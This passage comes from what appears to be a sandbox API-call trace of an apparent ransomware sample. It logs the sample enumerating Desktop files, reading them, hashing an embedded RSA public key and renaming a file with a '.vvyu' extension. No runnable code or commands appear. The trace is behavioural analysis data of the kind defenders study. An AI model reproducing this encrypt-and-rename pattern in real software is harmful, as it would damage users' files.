lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d32aa0 [0183.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0183.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.190] WriteFile (in: hFile=0x584, lpBuffer=0x2d32aa0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d32aa0*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32aa0 | out: hHeap=0x6a0000) returned 1 [0183.191] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.191] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.191] CloseHandle (hObject=0x584) returned 1 [0183.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d32670 [0183.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.193] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\5fJKex2DUyLjzY0p.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\5fjkex2duyljzy0p.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\5fJKex2DUyLjzY0p.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\5fjkex2duyljzy0p.bmp.vvyu")) returned 1 [0183.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0183.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.197] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.199] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d4b4f0, ftCreationTime.dwHighDateTime=0x1d89b91, ftLastAccessTime.dwLowDateTime=0x1c99e340, ftLastAccessTime.dwHighDateTime=0x1d89fd4, ftLastWriteTime.dwLowDateTime=0x1c99e340, ftLastWriteTime.dwHighDateTime=0x1d89fd4, nFileSizeHigh=0x0, nFileSizeLow=0xfdf7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5gGbG59NQgc.flv", cAlternateFileName="5GGBG5~1.FLV")) returned 1 [0183.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30958 [0183.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30958 | out: hHeap=0x6a0000) returned 1 [0183.200] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\5gGbG59NQgc.flv") returned=".flv" [0183.200] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\5gGbG59NQgc.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\5ggbg59nqgc.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.200] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=65015) returned 1 [0183.200] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.203] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xfdd1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.203] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.205] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.205] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xfdf7, lpOverlapped=0x0) returned 1 [0183.206] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.206] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.206] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.206] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.207] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.207] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.207] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.207] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.207] GetLastError () returned 0x0 [0183.208] SetLastError (dwErrCode=0x0) [0183.208] GetLastError () returned 0x0 [0183.208] SetLastError (dwErrCode=0x0) [0183.208] GetLastError () returned 0x0 [0183.208] SetLastError (dwErrCode=0x0) [0183.208] GetLastError () returned 0x0 [0183.208] SetLastError (dwErrCode=0x0) [0183.208] GetLastError () returned 0x0 [0183.208] SetLastError (dwErrCode=0x0) [0183.208] GetLastError () returned 0x0 [0183.208] SetLastError (dwErrCode=0x0) [0183.208] GetLastError () returned 0x0 [0183.208] SetLastError (dwErrCode=0x0) [0183.208] GetLastError () returned 0x0 [0183.208] SetLastError (dwErrCode=0x0) [0183.208] GetLastError () returned 0x0 [0183.208] SetLastError (dwErrCode=0x0) [0183.208] GetLastError () returned 0x0 [0183.208] SetLastError (dwErrCode=0x0) [0183.208] GetLastError () returned 0x0 [0183.208] SetLastError (dwErrCode=0x0) [0183.208] GetLastError () returned 0x0 [0183.209] SetLastError (dwErrCode=0x0) [0183.209] GetLastError () returned 0x0 [0183.209] SetLastError (dwErrCode=0x0) [0183.209] GetLastError () returned 0x0 [0183.209] SetLastError (dwErrCode=0x0) [0183.209] GetLastError () returned 0x0 [0183.209] SetLastError (dwErrCode=0x0) [0183.209] GetLastError () returned 0x0 [0183.209] SetLastError (dwErrCode=0x0) [0183.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.209] GetLastError () returned 0x0 [0183.209] SetLastError (dwErrCode=0x0) [0183.209] GetLastError () returned 0x0 [0183.209] SetLastError (dwErrCode=0x0) [0183.209] GetLastError () returned 0x0 [0183.209] SetLastError (dwErrCode=0x0) [0183.209] GetLastError () returned 0x0 [0183.209] SetLastError (dwErrCode=0x0) [0183.209] GetLastError () returned 0x0 [0183.209] SetLastError (dwErrCode=0x0) [0183.209] GetLastError () returned 0x0 [0183.209] SetLastError (dwErrCode=0x0) [0183.209] GetLastError () returned 0x0 [0183.209] SetLastError (dwErrCode=0x0) [0183.210] GetLastError () returned 0x0 [0183.210] SetLastError (dwErrCode=0x0) [0183.210] GetLastError () returned 0x0 [0183.210] SetLastError (dwErrCode=0x0) [0183.210] GetLastError () returned 0x0 [0183.210] SetLastError (dwErrCode=0x0) [0183.210] GetLastError () returned 0x0 [0183.210] SetLastError (dwErrCode=0x0) [0183.210] GetLastError () returned 0x0 [0183.210] SetLastError (dwErrCode=0x0) [0183.210] GetLastError () returned 0x0 [0183.210] SetLastError (dwErrCode=0x0) [0183.210] GetLastError () returned 0x0 [0183.210] SetLastError (dwErrCode=0x0) [0183.210] GetLastError () returned 0x0 [0183.210] SetLastError (dwErrCode=0x0) [0183.210] GetLastError () returned 0x0 [0183.210] SetLastError (dwErrCode=0x0) [0183.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.211] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.211] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.211] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.211] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.211] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfe00) returned 0x2d43778 [0183.212] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30958 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e618 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30910 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e660 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6f0 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6a8 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e648 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x6d5c88 [0183.213] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6d5c88, Size=0x218) returned 0x2d36670 [0183.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d36890 [0183.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6f0 | out: hHeap=0x6a0000) returned 1 [0183.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36890 | out: hHeap=0x6a0000) returned 1 [0183.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6a8 [0183.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0183.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e648 [0183.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e6f0 [0183.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0183.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0183.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6f0 | out: hHeap=0x6a0000) returned 1 [0183.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.216] GetCurrentThreadId () returned 0x264 [0183.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6cdf00 [0183.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.217] GetCurrentThreadId () returned 0x264 [0183.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6a8 [0183.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6f0 [0183.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e648 [0183.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e5d0 [0183.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6c0 [0183.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0183.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e690 [0183.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e678 [0183.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6d8 [0183.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e678 [0183.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6f0 | out: hHeap=0x6a0000) returned 1 [0183.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6f0 [0183.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d36670 [0183.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d36880 [0183.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6f0 | out: hHeap=0x6a0000) returned 1 [0183.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d36a98 [0183.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.223] HeapFree (in: 